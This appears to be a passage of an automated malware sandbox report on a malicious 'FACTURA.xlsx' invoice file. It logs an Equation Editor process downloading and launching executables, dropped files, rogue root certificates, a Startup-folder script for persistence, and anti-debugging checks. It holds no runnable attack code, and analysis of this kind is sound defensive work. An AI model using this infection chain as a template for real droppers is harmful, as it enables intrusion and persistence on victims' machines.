              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: bcrypt.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: sfc_os.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: devrtl.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: dwmapi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
              Source: FACTURA.xlsx Static file information: File size 2130920 > 1048576
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: FACTURA.xlsx Initial sample: OLE indicators vbamacros = False
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0094DA30 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 5_2_0094DA30
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_3_02B076E6 push ebx; iretd 5_3_02B076E9
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_00828945 push ecx; ret 5_2_00828958
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_01388945 push ecx; ret 6_2_01388958
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 18_2_00CAFF10 push es; retf 18_2_00CAFF1E
              Source: initial sample Static PE information: section name: UPX0
              Source: initial sample Static PE information: section name: UPX1

              Persistence and Installation Behavior

              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_035C03D5 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_035C03D5
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe File created: C:\Users\user\AppData\Local\complacence\outvaunts.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HKP098767890HJ[1].exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Temp\kudo.exe

              Boot Survival

              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_008048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 5_2_008048D7
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_00885376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 5_2_00885376
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013648D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 6_2_013648D7
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013E5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 6_2_013E5376
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00823187 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_00823187
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe API coverage: 4.7 %
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe API coverage: 4.6 %
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3700 Thread sleep time: -180000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0086445A GetFileAttributesW,FindFirstFileW,FindClose, 5_2_0086445A
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0086C6D1 FindFirstFileW,FindClose, 5_2_0086C6D1
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0086C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_0086C75C
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0086EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_0086EF95
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0086F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_0086F0F2
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0086F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 5_2_0086F3F3
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_008637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 5_2_008637EF
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_00863B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 5_2_00863B12
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0086BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 5_2_0086BCBC
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013C445A GetFileAttributesW,FindFirstFileW,FindClose, 6_2_013C445A
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013CC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_013CC75C
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013CC6D1 FindFirstFileW,FindClose, 6_2_013CC6D1
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013CEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_013CEF95
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013CF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_013CF0F2
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013CF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 6_2_013CF3F3
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013C37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_013C37EF
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013C3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_013C3B12
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013CBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 6_2_013CBCBC
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_008049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 5_2_008049A0
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe API call chain: ExitProcess graph end node
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe API call chain: ExitProcess graph end node
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_00873F09 BlockInput, 5_2_00873F09
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_00803B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 5_2_00803B3A
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00835A7C RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,5_2_00835A7C
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0094DA30 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 5_2_0094DA30
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_035C04E6 mov edx, dword ptr fs:[00000030h] 2_2_035C04E6
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_00A40608 mov eax, dword ptr fs:[00000030h] 5_2_00A40608
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_00A40668 mov eax, dword ptr fs:[00000030h] 5_2_00A40668
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_00A3EF88 mov eax, dword ptr fs:[00000030h] 5_2_00A3EF88
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_00A3EF76 mov eax, dword ptr fs:[00000030h] 5_2_00A3EF76
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_008AE386 mov eax, dword ptr fs:[00000030h] 6_2_008AE386
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_008AE398 mov eax, dword ptr fs:[00000030h] 6_2_008AE398
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_008AFA18 mov eax, dword ptr fs:[00000030h] 6_2_008AFA18
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_008AFA78 mov eax, dword ptr fs:[00000030h] 6_2_008AFA78
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 7_2_00CDF9C0 mov eax, dword ptr fs:[00000030h] 7_2_00CDF9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 7_2_00CDE340 mov eax, dword ptr fs:[00000030h] 7_2_00CDE340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 7_2_00CDE32E mov eax, dword ptr fs:[00000030h] 7_2_00CDE32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 7_2_00CDFA20 mov eax, dword ptr fs:[00000030h] 7_2_00CDFA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 8_2_007DF9C0 mov eax, dword ptr fs:[00000030h] 8_2_007DF9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 8_2_007DE340 mov eax, dword ptr fs:[00000030h] 8_2_007DE340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 8_2_007DE32E mov eax, dword ptr fs:[00000030h] 8_2_007DE32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 8_2_007DFA20 mov eax, dword ptr fs:[00000030h] 8_2_007DFA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 9_2_0087FA20 mov eax, dword ptr fs:[00000030h] 9_2_0087FA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 9_2_0087E32E mov eax, dword ptr fs:[00000030h] 9_2_0087E32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 9_2_0087F9C0 mov eax, dword ptr fs:[00000030h] 9_2_0087F9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 9_2_0087E340 mov eax, dword ptr fs:[00000030h] 9_2_0087E340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 10_2_007DF9C0 mov eax, dword ptr fs:[00000030h] 10_2_007DF9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 10_2_007DE340 mov eax, dword ptr fs:[00000030h] 10_2_007DE340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 10_2_007DE32E mov eax, dword ptr fs:[00000030h] 10_2_007DE32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 10_2_007DFA20 mov eax, dword ptr fs:[00000030h] 10_2_007DFA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 11_2_009CE32E mov eax, dword ptr fs:[00000030h] 11_2_009CE32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 11_2_009CFA20 mov eax, dword ptr fs:[00000030h] 11_2_009CFA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 11_2_009CF9C0 mov eax, dword ptr fs:[00000030h] 11_2_009CF9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 11_2_009CE340 mov eax, dword ptr fs:[00000030h] 11_2_009CE340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 12_2_0083FA20 mov eax, dword ptr fs:[00000030h] 12_2_0083FA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 12_2_0083E32E mov eax, dword ptr fs:[00000030h] 12_2_0083E32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 12_2_0083F9C0 mov eax, dword ptr fs:[00000030h] 12_2_0083F9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 12_2_0083E340 mov eax, dword ptr fs:[00000030h] 12_2_0083E340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 13_2_0071F9C0 mov eax, dword ptr fs:[00000030h] 13_2_0071F9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 13_2_0071E340 mov eax, dword ptr fs:[00000030h] 13_2_0071E340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 13_2_0071FA20 mov eax, dword ptr fs:[00000030h] 13_2_0071FA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 13_2_0071E32E mov eax, dword ptr fs:[00000030h] 13_2_0071E32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 14_2_0089E32E mov eax, dword ptr fs:[00000030h] 14_2_0089E32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 14_2_0089FA20 mov eax, dword ptr fs:[00000030h] 14_2_0089FA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 14_2_0089F9C0 mov eax, dword ptr fs:[00000030h] 14_2_0089F9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 14_2_0089E340 mov eax, dword ptr fs:[00000030h] 14_2_0089E340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 15_2_0092FA20 mov eax, dword ptr fs:[00000030h] 15_2_0092FA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 15_2_0092E32E mov eax, dword ptr fs:[00000030h] 15_2_0092E32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 15_2_0092F9C0 mov eax, dword ptr fs:[00000030h] 15_2_0092F9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 15_2_0092E340 mov eax, dword ptr fs:[00000030h] 15_2_0092E340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 16_2_0095FA20 mov eax, dword ptr fs:[00000030h] 16_2_0095FA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 16_2_0095E32E mov eax, dword ptr fs:[00000030h] 16_2_0095E32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 16_2_0095F9C0 mov eax, dword ptr fs:[00000030h] 16_2_0095F9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 16_2_0095E340 mov eax, dword ptr fs:[00000030h] 16_2_0095E340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 18_2_00CAF9C0 mov eax, dword ptr fs:[00000030h] 18_2_00CAF9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 18_2_00CAE340 mov eax, dword ptr fs:[00000030h] 18_2_00CAE340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 18_2_00CAE32E mov eax, dword ptr fs:[00000030h] 18_2_00CAE32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 18_2_00CAFA20 mov eax, dword ptr fs:[00000030h] 18_2_00CAFA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 19_2_0079FD50 mov eax, dword ptr fs:[00000030h]19_2_0079FD50
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 19_2_0079E6D0 mov eax, dword ptr fs:[00000030h]19_2_0079E6D0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 19_2_0079E6BE mov eax, dword ptr fs:[00000030h]19_2_0079E6BE
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 19_2_0079FDB0 mov eax, dword ptr fs:[00000030h]19_2_0079FDB0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 20_2_008BF6D8 mov eax, dword ptr fs:[00000030h]20_2_008BF6D8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 20_2_008BDFE6 mov eax, dword ptr fs:[00000030h]20_2_008BDFE6
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 20_2_008BF678 mov eax, dword ptr fs:[00000030h]20_2_008BF678
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 20_2_008BDFF8 mov eax, dword ptr fs:[00000030h]20_2_008BDFF8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 21_2_008FE32E mov eax, dword ptr fs:[00000030h]21_2_008FE32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 21_2_008FFA20 mov eax, dword ptr fs:[00000030h]21_2_008FFA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 21_2_008FF9C0 mov eax, dword ptr fs:[00000030h]21_2_008FF9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 21_2_008FE340 mov eax, dword ptr fs:[00000030h]21_2_008FE340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 22_2_0093FA20 mov eax, dword ptr fs:[00000030h]22_2_0093FA20
